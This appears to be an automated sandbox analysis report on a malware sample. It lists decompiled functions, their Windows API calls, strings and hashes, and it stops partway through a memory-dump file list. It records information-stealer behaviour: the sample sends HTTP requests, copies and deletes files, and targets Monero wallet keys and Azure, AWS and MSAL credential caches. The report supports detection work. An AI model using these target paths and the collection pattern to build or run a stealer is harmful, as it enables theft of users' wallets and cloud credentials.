Instruction Fuzzy Hash: D1123771950109ABDB04FBA0DDAADEE7B38BF94301F50415AF907A6091EF346E0DCB66

Function 00545960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005459F8
StrCmpCA.SHLWAPI(?,0127E570), ref: 00545A13
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00545B93
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0127E590,00000000,?,01279DB8,00000000,?,00561A1C), ref: 00545E71
lstrlen.KERNEL32(00000000), ref: 00545E82
GetProcessHeap.KERNEL32(00000000,?), ref: 00545E93
RtlAllocateHeap.NTDLL(00000000), ref: 00545E9A
lstrlen.KERNEL32(00000000), ref: 00545EAF
lstrlen.KERNEL32(00000000), ref: 00545ED8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00545EF1
lstrlen.KERNEL32(00000000,?,?), ref: 00545F1B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00545F2F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00545F4C
InternetCloseHandle.WININET(00000000), ref: 00545FB0
InternetCloseHandle.WININET(00000000), ref: 00545FBD
HttpOpenRequestA.WININET(00000000,0127E580,?,0127DDD8,00000000,00000000,00400100,00000000), ref: 00545BF8

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

InternetCloseHandle.WININET(00000000), ref: 00545FC7

Strings

", xrefs: 00545CD5
", xrefs: 00545E16
------, xrefs: 00545A96
------, xrefs: 00545D4C
------, xrefs: 00545C0B

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 935564ca241390657c94225a41e87a54abc98bf0fe2bfc6ebd26f50ef29b3f2a
Instruction ID: 48f3c7559abdd137c8d5c6af648a0369fb24c6e24ac3b8638d6b027b0b994454
Opcode Fuzzy Hash: 935564ca241390657c94225a41e87a54abc98bf0fe2bfc6ebd26f50ef29b3f2a
Instruction Fuzzy Hash: B0122172820119ABDB15EBA0DCA9FEEB778BF54701F50429AB50663091EF303A4DCF65

Function 0054CEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01278970,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,01279ED8,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01278970,?,\Monero\wallet.keys,00560E17), ref: 00558B86

Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054CF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0054D0C7
RtlAllocateHeap.NTDLL(00000000), ref: 0054D0CE
lstrcat.KERNEL32(?,00000000), ref: 0054D208
lstrcat.KERNEL32(?,00561478), ref: 0054D217
lstrcat.KERNEL32(?,00000000), ref: 0054D22A
lstrcat.KERNEL32(?,0056147C), ref: 0054D239
lstrcat.KERNEL32(?,00000000), ref: 0054D24C
lstrcat.KERNEL32(?,00561480), ref: 0054D25B
lstrcat.KERNEL32(?,00000000), ref: 0054D26E
lstrcat.KERNEL32(?,00561484), ref: 0054D27D
lstrcat.KERNEL32(?,00000000), ref: 0054D290
lstrcat.KERNEL32(?,00561488), ref: 0054D29F
lstrcat.KERNEL32(?,00000000), ref: 0054D2B2
lstrcat.KERNEL32(?,0056148C), ref: 0054D2C1
lstrcat.KERNEL32(?,00000000), ref: 0054D2D4
lstrcat.KERNEL32(?,00561490), ref: 0054D2E3

Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885

lstrlen.KERNEL32(?), ref: 0054D32A
lstrlen.KERNEL32(?), ref: 0054D339

Part of subcall function 0055AA70: StrCmpCA.SHLWAPI(01278A50,0054A7A7,?,0054A7A7,01278A50), ref: 0055AA8F

DeleteFileA.KERNEL32(00000000), ref: 0054D3B4

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 3abaefa25ca173ca5b7ed485bf44b03ff8c74ea2636fe00192b73d6d5046811f
Instruction ID: daff3c0568003a57e0aab7c61909c9827e7965a6cd359e89f2890930244ebe0b
Opcode Fuzzy Hash: 3abaefa25ca173ca5b7ed485bf44b03ff8c74ea2636fe00192b73d6d5046811f
Instruction Fuzzy Hash: B9E15671950105ABDB04EBA0DD69EEE7B78BF54302F104156F507A7091EE387E09CB76

Function 00558320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

RegOpenKeyExA.KERNEL32(00000000,0127B0E0,00000000,00020019,00000000,005605B6), ref: 005583A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00558426
wsprintfA.USER32 ref: 00558459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0055847B
RegCloseKey.ADVAPI32(00000000), ref: 0055848C
RegCloseKey.ADVAPI32(00000000), ref: 00558499

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Strings

- , xrefs: 005585A3
?, xrefs: 0055837A
%s\%s, xrefs: 0055844D

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 6eff9636dfc4380b16ecf474006e61e2b971cfbef7a8043e9befca48a4b9f3be
Instruction ID: 4db97ab99808f7c869fc04b5572e0e5550160f43435c2e3f83d23996b033f30c
Opcode Fuzzy Hash: 6eff9636dfc4380b16ecf474006e61e2b971cfbef7a8043e9befca48a4b9f3be
Instruction Fuzzy Hash: 65813E7191011CABEB24DB50CC95FEA7BB8FF48701F10869AE509A6180DF746B89CFA5

Function 00546280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
StrCmpCA.SHLWAPI(?,0127E570), ref: 00546303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
HttpOpenRequestA.WININET(00000000,GET,?,0127DDD8,00000000,00000000,00400100,00000000), ref: 00546385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 005463FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0054646D
InternetCloseHandle.WININET(00000000), ref: 005464EF
InternetCloseHandle.WININET(00000000), ref: 005464F9
InternetCloseHandle.WININET(00000000), ref: 00546503

Strings

ERROR, xrefs: 005464C9
ERROR, xrefs: 00546407
GET, xrefs: 0054637C

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 30e34458e812e1ba0c779844bb5361cf987b22eed283cb1ded8959eef6cf28d2
Instruction ID: 7f514b6d827b27c4ef4e35ce086dbf0955f25cf08fa387ffc761687a3b59f8c0
Opcode Fuzzy Hash: 30e34458e812e1ba0c779844bb5361cf987b22eed283cb1ded8959eef6cf28d2
Instruction Fuzzy Hash: 69717E71A40218ABEF24DFA0CC99BEE7B74FB44705F108199F5096B190DBB46A89CF52

Function 00555510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885

Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 005556A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555857

Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6

Part of subcall function 005551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555228

Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905

Part of subcall function 005552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555318
Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 0055532F
Part of subcall function 005552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00555364
Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 00555383
Part of subcall function 005552C0: lstrlen.KERNEL32(00000000), ref: 005553AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0055578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00555940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555A0C
Sleep.KERNEL32(0000EA60), ref: 00555A1B

Strings

ERROR, xrefs: 0055577D
ERROR, xrefs: 005559FE
ERROR, xrefs: 00555932
ERROR, xrefs: 00555849
ERROR, xrefs: 00555636
ERROR, xrefs: 00555693

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301771483.0000000000A3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301871395.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_540000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: e41ed01a74290c51a0f4368e2e6b5f01d8b2d10f3cd89c20b1617a096df57c12
Instruction ID: 5a177d458226dcc38ccf78542989660d096b988be3e639be12728353077dd10b
Opcode Fuzzy Hash: e41ed01a74290c51a0f4368e2e6b5f01d8b2d10f3cd89c20b1617a096df57c12
Instruction Fuzzy Hash: 2DE16471910505AADB04FBB0DC7ADED7B38BF94301F50822AB90756491FF346A4DCBA6

Function 00554D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B

lstrcat.KERNEL32(?,00000000), ref: 00554DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00554DCD

Part of subcall function 00554910: wsprintfA.USER32 ref: 0055492C
Part of subcall function 00554910: FindFirstFileA.KERNEL32(?,?), ref: 00554943

lstrcat.KERNEL32(?,00000000), ref: 00554E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00554E59

Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
Part of subcall function 00554910: FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
Part of subcall function 00554910: FindClose.KERNEL32(000000FF), ref: 00554B92

lstrcat.KERNEL32(?,00000000), ref: 00554EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00554EE5

Part of subcall function 00554910: wsprintfA.USER32 ref: 005549B0
Part of subcall function 00554910: StrCmpCA.SHLWAPI(?,005608D2), ref: 005549C5
Part of subcall function 00554910: wsprintfA.USER32 ref: 005549E2
Part of subcall function 00554910: PathMatchSpecA.SHLWAPI(?,?), ref: 00554A1E
Part of subcall function 00554910: lstrcat.KERNEL32(?,0127E4D0), ref: 00554A4A
Part of subcall function 00554910: lstrcat.KERNEL32(?,00560FF8), ref: 00554A5C
Part of subcall function 00554910: lstrcat.KERNEL32(?,?), ref: 00554A70
Part of subcall function 00554910: lstrcat.KERNEL32(?,00560FFC), ref: 00554A82
Part of subcall function 00554910: lstrcat.KERNEL32(?,?), ref: 00554A96
Part of subcall function 00554910: CopyFileA.KERNEL32(?,?,00000001), ref: 00554AAC
Part of subcall function 00554910: DeleteFileA.KERNEL32(?), ref: 00554B31

Strings

*.*, xrefs: 00554E64
\.aws\, xrefs: 00554E4D
Azure\.aws, xrefs: 00554E5F
msal.cache, xrefs: 00554EF0
*.*, xrefs: 00554DD8
Azure\.azure, xrefs: 00554DD3
Azure\.IdentityService, xrefs: 00554EEB
\.IdentityService\, xrefs: 00554ED9
\.azure\, xrefs: 00554DC1

Memory Dump Source

Source File: 00000000.00000002.2301065818.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true

Associated: 00000000.00000002.2301049191.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000059A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000062F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000064F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.00000000006E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.0000000000705000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301065818.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2301419011.0000000000A03000.00000040.00000001.01000000.00000003.sdmpDownload File
